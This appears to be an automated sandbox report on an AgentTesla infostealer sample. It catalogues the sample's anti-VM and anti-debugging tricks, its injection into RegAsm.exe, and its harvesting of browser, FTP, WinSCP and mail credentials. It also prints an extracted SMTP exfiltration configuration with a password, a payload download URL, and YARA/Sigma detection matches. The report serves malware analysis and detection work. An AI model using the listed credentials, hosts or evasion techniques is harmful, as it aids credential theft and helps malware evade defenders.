Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Tries to detect virtualization through RDTSC time measurementsShow sources
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeRDTSC instruction interceptor: First address: 0000000002BA4556 second address: 0000000002BA4574 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c pushad 0x0000000d mov eax, 00000001h 0x00000012 cpuid 0x00000014 bt ecx, 1Fh 0x00000018 jc 00007F2BA0F185D2h 0x0000001a popad 0x0000001b lfence 0x0000001e rdtsc
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeRDTSC instruction interceptor: First address: 0000000002BA4574 second address: 0000000002BA4556 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F2BA0416350h 0x00000011 ret 0x00000012 add edi, edx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 cmp ecx, 00000000h 0x00000019 jne 00007F2BA0416373h 0x0000001b push ecx 0x0000001c call 00007F2BA04163E5h 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeRDTSC instruction interceptor: First address: 0000000002BA4574 second address: 0000000002BA4556 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F2BA0770350h 0x00000011 ret 0x00000012 add edi, edx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 cmp ecx, 00000000h 0x00000019 jne 00007F2BA0770373h 0x0000001b push ecx 0x0000001c call 00007F2BA07703E5h 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeRDTSC instruction interceptor: First address: 0000000002BA4556 second address: 0000000002BA4574 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c pushad 0x0000000d mov eax, 00000001h 0x00000012 cpuid 0x00000014 bt ecx, 1Fh 0x00000018 jc 00007F2BA094D252h 0x0000001a popad 0x0000001b lfence 0x0000001e rdtsc
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeRDTSC instruction interceptor: First address: 0000000002BA4574 second address: 0000000002BA4556 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F2BA0F185A0h 0x00000011 ret 0x00000012 add edi, edx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 cmp ecx, 00000000h 0x00000019 jne 00007F2BA0F185C3h 0x0000001b push ecx 0x0000001c call 00007F2BA0F18635h 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeRDTSC instruction interceptor: First address: 0000000002BA4556 second address: 0000000002BA4574 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c pushad 0x0000000d mov eax, 00000001h 0x00000012 cpuid 0x00000014 bt ecx, 1Fh 0x00000018 jc 00007F2BA0416382h 0x0000001a popad 0x0000001b lfence 0x0000001e rdtsc
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeRDTSC instruction interceptor: First address: 0000000002BA4574 second address: 0000000002BA4556 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F2BA094D220h 0x00000011 ret 0x00000012 add edi, edx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 cmp ecx, 00000000h 0x00000019 jne 00007F2BA094D243h 0x0000001b push ecx 0x0000001c call 00007F2BA094D2B5h 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeRDTSC instruction interceptor: First address: 0000000002BA4556 second address: 0000000002BA4574 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c pushad 0x0000000d mov eax, 00000001h 0x00000012 cpuid 0x00000014 bt ecx, 1Fh 0x00000018 jc 00007F2BA0770382h 0x0000001a popad 0x0000001b lfence 0x0000001e rdtsc
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_01124553 rdtsc 10_2_01124553
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeAPI coverage: 8.0 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 4872Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6216Thread sleep time: -45000s >= -30000sJump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: bF7H5z6B1q.exe, 00000003.00000002.15790978993.00000000005C3000.00000004.00000020.sdmpBinary or memory string: \??\C:\ProgramData\qemu-ga\qga.stateE
Source: RegAsm.exe, 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmpBinary or memory string: C:\ProgramData\qemu-ga\qga.state
Source: RegAsm.exe, 0000000A.00000002.16901627510.00000000013AF000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW&
Source: RegAsm.exe, 0000000A.00000002.16901282156.0000000001340000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
Source: RegAsm.exe, 0000000A.00000002.16901627510.00000000013AF000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internetw^
Source: bF7H5z6B1q.exe, 00000003.00000002.15790978993.00000000005C3000.00000004.00000020.sdmpBinary or memory string: C:\ProgramData\qemu-ga\qga.statem
Source: RegAsm.exe, 0000000A.00000002.16915141303.0000000022510000.00000002.00000001.sdmpBinary or memory string: Insufficient privileges. Only administrators or users that are members of the Hyper-V Administrators user group are permitted to access virtual machines or containers. To add yourself to the Hyper-V Administrators user group, please see https://aka.ms/hcsadmin for more information.
Queries a list of all running processesShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to hide a thread from the debuggerShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112039C NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,0000000010_2_0112039C
Hides threads from debuggersShow sources
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_01124553 rdtsc 10_2_01124553
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_01124EF6 LdrInitializeThunk,10_2_01124EF6
Contains functionality to read the PEBShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_01122907 mov eax, dword ptr fs:[00000030h]10_2_01122907
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112290C mov eax, dword ptr fs:[00000030h]10_2_0112290C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112296C mov eax, dword ptr fs:[00000030h]10_2_0112296C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_011224B4 mov eax, dword ptr fs:[00000030h]10_2_011224B4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_01129F1B mov eax, dword ptr fs:[00000030h]10_2_01129F1B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_01128700 mov eax, dword ptr fs:[00000030h]10_2_01128700
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_01127200 mov eax, dword ptr fs:[00000030h]10_2_01127200
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_01124277 mov eax, dword ptr fs:[00000030h]10_2_01124277
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_01124279 mov eax, dword ptr fs:[00000030h]10_2_01124279
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0112728F mov eax, dword ptr fs:[00000030h]10_2_0112728F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_01121AA2 mov eax, dword ptr fs:[00000030h]10_2_01121AA2
Enables debug privilegesShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess token adjusted: DebugJump to behavior
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\bF7H5z6B1q.exe' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profileJump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: RegAsm.exe, 0000000A.00000002.16903261598.00000000018D0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: RegAsm.exe, 0000000A.00000002.16903261598.00000000018D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000000A.00000002.16903261598.00000000018D0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: RegAsm.exe, 0000000A.00000002.16903261598.00000000018D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Uses netsh to modify the Windows network and firewall settingsShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile

Stealing of Sensitive Information:

barindex
Yara detected AgentTeslaShow sources
Source: Yara matchFile source: 0000000A.00000002.16909660570.000000001FED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000A.00000002.16911083237.000000002001C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000A.00000002.16909949970.000000001FF28000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5096, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Tries to harvest and steal ftp login credentialsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior

Remote Access Functionality:

barindex
Yara detected AgentTeslaShow sources
Source: Yara matchFile source: 0000000A.00000002.16909660570.000000001FED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000A.00000002.16911083237.000000002001C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000A.00000002.16909949970.000000001FF28000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5096, type: MEMORY

Malware Configuration

Threatname: Agenttesla

{"Username: ": "=0A0jhVRt", "URL: ": "http://65WgO3Tt3vwSLEL.net", "To: ": "chimez2@originloger.com", "ByHost: ": "us2.smtp.mailhostbox.com:587", "Password: ": "DSMwV2T", "From: ": "chimez2@originloger.com"}

Signature Similarity

Sample Distance (10 = nearest)
10 9 8 7 6 5 4 3 2 1
Samplename Analysis ID SHA256 Similarity

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

No simulations

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
bF7H5z6B1q.exe16%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://167.114.85.125/go/Jay_uncrypt_rZmowgNiLH235.bin9%VirustotalBrowse
http://167.114.85.125/go/Jay_uncrypt_rZmowgNiLH235.bin100%Avira URL Cloudmalware
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#3%VirustotalBrowse
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%Avira URL Cloudsafe
http://ocsp.sectigo.com0A0%Avira URL Cloudsafe
https://sectigo.com/CPS00%VirustotalBrowse
https://sectigo.com/CPS00%Avira URL Cloudsafe
http://167.114.85.125/go/Jay_uncrypt_rZmowgNiLH235.binP0%Avira URL Cloudsafe
http://65WgO3Tt3vwSLEL.net0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.16909660570.000000001FED0000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000A.00000002.16911083237.000000002001C000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000000.15658304569.0000000000415000.00000020.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
      • 0x10c20:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
      00000003.00000000.15658304569.0000000000415000.00000020.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18_RID328FSemiautomatic generated rule - file scan copy.pdf.r11Florian Roth
      • 0x10c20:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
      0000000A.00000002.16909949970.000000001FF28000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
        • 0x10c20:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
        00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18_RID328FSemiautomatic generated rule - file scan copy.pdf.r11Florian Roth
        • 0x10c20:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
        Process Memory Space: RegAsm.exe PID: 5096JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

          Unpacked PEs

          No yara matches

          Sigma Overview


          System Summary:

          barindex
          Sigma detected: RegAsm connects to smtp portShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 208.91.199.223, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Initiated: true, ProcessId: 5096, Protocol: tcp, SourceIp: 192.168.0.80, SourceIsIpv6: false, SourcePort: 49771

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          208.91.199.223Price List Order SV 26.docGet hashmaliciousBrowse
            RFQ#NS109004.PDF.exeGet hashmaliciousBrowse
              Copia rapida 954789400_PDF__________________________.exeGet hashmaliciousBrowse
                Order code PO 2019930-002793.exeGet hashmaliciousBrowse
                  EPC Samgori South Dome Underground Gas Storage Project.exeGet hashmaliciousBrowse
                    PO19005309.exeGet hashmaliciousBrowse
                      PaymentConfirmation.exeGet hashmaliciousBrowse
                        Scan Document21112019 pdf.exeGet hashmaliciousBrowse
                          x4NQLBB9Rs.exeGet hashmaliciousBrowse
                            x4NQLBB9Rs.exeGet hashmaliciousBrowse
                              Scan Document11192019 pdf.exeGet hashmaliciousBrowse
                                #3640.exeGet hashmaliciousBrowse
                                  10CI099808.exeGet hashmaliciousBrowse
                                    8INVOICE.exeGet hashmaliciousBrowse
                                      37SWIFT DOO732019USD67,000.exeGet hashmaliciousBrowse